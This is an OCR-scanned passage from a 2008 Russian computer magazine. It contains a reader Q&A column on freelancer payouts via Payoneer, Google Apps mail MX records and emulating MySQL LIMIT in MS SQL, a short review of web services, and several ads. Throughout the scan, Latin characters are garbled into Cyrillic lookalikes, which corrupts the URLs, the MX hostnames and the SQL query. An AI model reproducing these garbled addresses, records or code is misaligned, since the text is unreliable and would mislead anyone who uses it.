обычно составляет до 4 дней. Комиссия за 
обналичивание чека: 4% от его суммы, но не 
менее $1 0. 

В будущем сервис планирует работать с бан- 
ковскими АТМ-картами (пользователям будут 
высылаться карты, на которые и будут перево- 
диться обналиченные деньги). 

Нужен НазИ-баннер для моего сайта, но 



денег, чтобы заказать егоу дизайнеров, нет 
:(. Посоветуй, что делать. 

А: Специально для таких халявщиков, как 
ты, придуман сервис ЬКр://1 23-Ьаппег.сот . 
Тутты сможешь прямо в онлайне создать 
свой собственный неплохой флеш-баннер. 

Все просто: сначала выбираешьтип баннера 
(ОгарЫс Ваппег, БоипсІ Ваппег, Рісіиге Ваппег, 
Рееі Ваппег, 80x210 Ваппег), затем загружа- 
ешь фоновый рисунок и задаешь различные 
параметры текста, который будет размещен на 
баннере. После этих нехитрых манипуляций у 
тебя появится бесплатная профессиональная 
флешка ствоей рекламой. 

О: Как настроить дтаіі на свой домен, ис- 
пользуя классный е-таіі адрес вроде ѵазуаГЗ 
риркіп.ги и удобный интерфейс почтовика 
от боодіе? 

А: Предположим, что доменное имя у тебя уже 
есть. Впрочем, даже если ты не успел обзавес- 
тись собственным доменом, проблем возник- 
нуть не должно: в Сети сейчас доступно просто 
огромное количество регистраторов, каждый 
из которых пытается предложить наиболее 
выгодные условия ($10-20 в год, а то и вовсе 
бесплатно в случае покупки хостинга — это 
самое обычное предложение). 

Первое, что нужно сделать, — зайти на сайт 
ѵѵѵѵѵѵ.аооаІе.сот/а/ЬеІр/іпи/еп/Ьизіпезз/ 
аррІісаІіопз.ЫтІ и зарегистрироваться. Ты 
можешь воспользоваться либо бесплатным 
предложением, либо купить прокаченный 
(Ргетіег) аккаунт, для которого доступны 25 Гб 
(против 6,5 Гб) и некоторые дополнительные 
возможности. Во время регистрации необ- 
ходимо выбрать варианте использованием 
уже существующего домена: «I ѵѵапі Іо изе 
ап ехізііпд ботаіппате». Однако, придется 
доказать боодіе, что домен принадлежит 
именно тебе, а для этого на хостинг потребуется 
залить специальный файл. Создай документ 
доодіеііозіесізегѵісе . іііті, впиши в него 
код, который попросит боодіе, и загрузи его в 
корневую папку своего сайта через РТР-клиент 
или панель администратора сайта. Далее необ- 
ходимо найти, где у твоего хостера/регистрато- 
ра находятся настройки бЫБ — это необходимо, 
чтобы заменить существующие МХ-записи на 
МХ-записи боодіе’а. В соответствующей пане- 
ли необходимо создать записи со следующими 
параметрами: 

Тип всех записей — МХ 

Почтовый домен — оставляй пустым 

Почтовый сервер и приоритет почтово- 
го сервера: 

А5РМХ . Ь . СООСЬЕ . СОМ . - приоритет 1 0 

АЬТІ . А5РМХ . Ь . СООСЬЕ . СОМ .-20 

АЬТ2 . А5РМХ . Ь . СООСЬЕ . СОМ .-20 
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АЗРМХ2 . СООСЬЕМАІЬ . СОМ . - 30 
АЗРМХЗ . СООСЬЕМАІЬ . СОМ . -30 
АЗРМХ4 . СООСЬЕМАІЬ . СОМ . -30 
АЗРМХ5 . СООСЬЕМАІЬ . СОМ . - 30 

Теперь остается настроить интерфейс самого боодіе. Для этого перехо- 
дим на ЬирѴ/аооаІе.сот/а/ . логинимся, переходим в панельуправления 
и кликаем по ссылке «Мападе іЫб сіотаіп» (управление доменом), где 
включаем работу с е-таіі. боодіе проверит правильность указанных 
МХ-записей и, если все О К, — обновит базы. Теперь ты можешь создать 
пользователей и наслаждаться интерфейсом и возможностями бтаіГа 
для своего произвольного е-таіі адреса! 

0: Хочу начать работать на западных биржах для фрилансеров. Ин- 
тересуеттакой вопрос: как наиболее просто получить заработанные 

деньги? 

А: Долгое время проблема заключалась втом, чтоу каждой из популяр- 
ных бирж (ОеіАРгееІапсег, ГепіАСобег, обезк, еІ_апсе] были свои собст- 
венные порядки вывода денег. Одни предлагают выслать чек, который 
сложно и долго обналичивать, другие — выплаты через платежную систе- 
му РауРаІ, которая при всех свои достоинствах не позволяет принимать 
деньги резидентам из СНГ. Однако за последний год все перечисленные 
системы стали поддерживать новый метод выплате использованием 
дебетовых карточекот компании Раѵопеег ( ѵѵщѵѵ.раѵопеег.согп ). Заказать 
карту можно либо у самого сервиса, либо через посредника — влюбом 
случае она придеттебе втечение нескольких недель. За пересылку 
с тебя возьмут $20, которые спишутся, кактолько на карте окажется 
достаточно средств. Для вывода оплаты тебе остается только указать 
параметры своего аккаунта в Рауопеег, после чего быстро снимать пере- 
численные деньги через любой банкомат. 

Помимо возможности выводить деньги с внутренних счетов фрилансер- 
ских бирж, ты получаешь массу бонусов. Во-первых, ты приобретаешь 
карту международной платежной системы МавІегсагсІ (обслуживание 
такой карты в обычном банке обойдется не дешевле $20 в год), кото- 
рую можешь использовать в любых магазинах, втом числе и онлайн. 
Во-вторых, ты сможешь выводить на нее ѴѴеЬтопеу, используя сервис 
СагсІМопеу (сагбтопеу.ги). 

О: По просьбе заказчика переписываю код для работы с МБ 501. 
вместо СУБД МуБОІ., которая использовалась ранее. И не могу 
понять: неужели в СУБД от МісгозоН нет такой полезной вещи, как 
возможность указать ЫМІТ в 5ЕІ.ЕСТ запросе? Если так, то как это 
можно обойти? 

А: М5 5 О І_ действительно не имеетаналога ЫМІТ. После длительного 
использования Му5СП_ это дико раздражает. Но решение есть. Оцени 
разницу. В Му50І_ запрос выглядит следующим образом: 

ЗЕЬЕСТ * РКОМ ' зоше_1аЫе ' ЫМІТ 10, 20 

В случае с М5 500 придется «изобретать велосипед», что непременно 
приводит к потере производительности. 

1. ЗЕЬЕСТ Ьор 20 * ЕРОМ [зоше.ОаЫе] 

2. ШЕРЕ [ргітагу_кеу_біе1й] ШТ Ш 

3 . ( 

4. ЗЕЬЕСТ Ьор 10 [ргішагу_кеу_біе1с1] 

5. РРОМ [зоте_ЬаЫе] 

6. ОРБЕР ВУ [ргішагу_кеу_біе1(1] 

7. ) 

8. ОРБЕР ВУ [ргітагу_кеу_1іе1сІ] ЕС 



Расскажи о своем хобби на сайте 

НоЪЪуВага.т. общайся, 
участвуй в жизни сайта 
и получи 1 000 000 рублей 
на твое хобби!* 



І 



Покупай пиво 21аІу Вагапі в бутылках 
0,5 л с промо этикеткой и специальным 
кодом под каждой крышкой. 



Со 2 июня по 29 августа * * 
зарегистрируй код на сайте 
НоЬЬуВага.Ш и прими участие 
в ежедневном розыгрыше 
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а а 
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телефонов 5АМ5ШС 5СН-С800 
с фотокамерой 



Общайся на НоЬЬуВага.Ш . 
расскажи всем о своих 
увлечениях, участвуй в 
творческих конкурсах, размещай статьи 
и фотографии о своем хобби, голосуй! 
Став активным участником сайта, 
ты получишь возможность выиграть 
1 000 000 рублей! 



Информацию об организаторе Акций***, о правилах их 
проведения и количестве призов по результатам их проведе- 
ния, сроках, месте и порядке получения призов можно узнать 
на сайте ѵѵѵѵѵѵ.ЬоЬЬуЬага.ги. Кроме того, вопросы, связанные с 
проведением Акций, можно задать по телефону горячей 
линии 8-800-333-01-20 (звонок по России бесплатный). 

В творческом конкурсе и стимулирующей лотерее могут 
принимать участие только лица, достигшие 1 8 лет. 

*Сроки проведения творческого конкурса с 02 июня 2008 г. 
по 1 5 августа 2008 г. 

**Сроки проведения стимулирующей лотереи с 02 июня 2008г 
по 20 ноября 2008 г. 

*’*Под Акциями понимаются творческий конкурс 
и стимулирующая лотерея. 
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ОБНЫЕ ВЕБСЕРВИСЫ 
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ВТОРОГО ПОКОЛЕНИЯ 



В этой мини-рубрике мы пишем об интересных и полезных ѵѵеЬ-сервисах, 
которые реально могут помочь тебе упростить и улучшить свою 
сетевую жизнь. 




ТУРЕ РАС ЕР 



РІ.АѴ.ТѴРЕРАСЕР.СОМ 



Не в пример многим другим клавиатурным тренажерам, сводящим процесс! 
обучения кжуткой нудятине, ТуреРасегпозволяетсовместить приятное с 
полезным. Обучение слепому набору реализовано в виде забавной онлайн 
игры. Участники соревнуются между собой в скорости набора: чем быстрее 
печатаешь слова, тем быстреетвоя машинка приближается к финишу. Кто 
первый —тоти победил. Судя по рейтингу, некоторые юзеры сделали глубо 
кийтюнингрукитеперь набирают до 130 слов в минуту 1 ! 



ОШЫЕ РЕѲІІАР ЕХРРЕ55ЮЫ 
ТЕ5ТІЫѲТ00І_ 



еЗКІЫМЕР-СОМ/РЕбЕХР 



Невероятно полезный сервис, который поможет составить и протестировать" 
регулярные выражения любой сложности. Воспользоваться им могут как 
бывалые девелоперы, таки начинающие программисты, имеющиелишь 
небольшое представление отом, каксоставлять регеспы. Для любых конс- 
рукций доступна понятная шпаргалка, а результат выполнения регулярки 
наглядно отображается на произвольном тексте. В закладки, однозначно! 




Ѳ00ѲІ.Е5ІТЕ5 



5ІТЕ5.Ѳ006І_Е.С0М 



Конструктор сайтов ОоодІеБіІез — это не уже не новый сервис, но только 
сейчас он стал бесплатным и доступным всем желающим. Фактически, это 
готовая система управления контентом со встроенным ѴѴУ5ІѴѴУ 6 -редакто ром 
и халявным хостингом. Приятно, что в основе таких сайтов лежит довольно 
удобный ѵѵікі -движок, позволяющий создавать симпатично оформленные 
документы совместно с другими пользователями. 



Намедни гулял поТіте Вриаге в Нью-Йорке и по Воиіб Веасб в Майами, а | 
потом заглянул в Моипіаіп Ѵіеѵѵ — небольшой городок в Силиконовой доли- 
не. Количество городов, доступных для виртуальной прогулки в Вігееі Ѵіеѵѵ 
(тарв.доодІе.сот/ЬеІр/тарзМгееІѵіеѵѵ), неустанно увеличивается, но руки 
до Москвы у боодіе’а пока недошли. Зато за нее взялся отряд энтузиастов, 
который своими силами собрал оборудование и «отщелкал» весь центр | 
Москвы. Результат — на сайте Кагіатапіа. 



► 144 



ХАКЕР 06 /114/ 08 










ѵиитгагіігіаз^ооіЬаитападег.ги 



Ста н ь футболь н ым меиеджер-зм. Собери хом^нду мечты 
Пр^мц участий іі Чемпионате Еьрепы 2 00 Ѳ нерааись іо самый желанный футбольный трофей 
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Москва 
С-Петербург 
Владивосток 
Новосибирск 
Красноярск 
Екатеринбург 
Якутск 
Самара 
Иркутск 
Н. Новгород 
Ростов 
Уфа 

Воронеж 

Ярославль 

Челябинск 

Кемерово 

Пермь 




Мониторы Тора? Т200 и Т220 - официальные мониторы ѴѴСѲ 2008 

Соединение великолепного дизайна и технического совершенства 



■ рекордная быстрота реакции матрицы 2 мс 

■ динамическая контрастность 20 000:1 



■ разрешение 1680x1050 

■ углы обзора 1 7071 60° (СРЫ 0) 




Российский этап Чемпионата мира 
по компьютерным играм ѴѴС6 2008 



Вся информация на ѵѵѵѵѵѵ.ѵѵсд.ги 



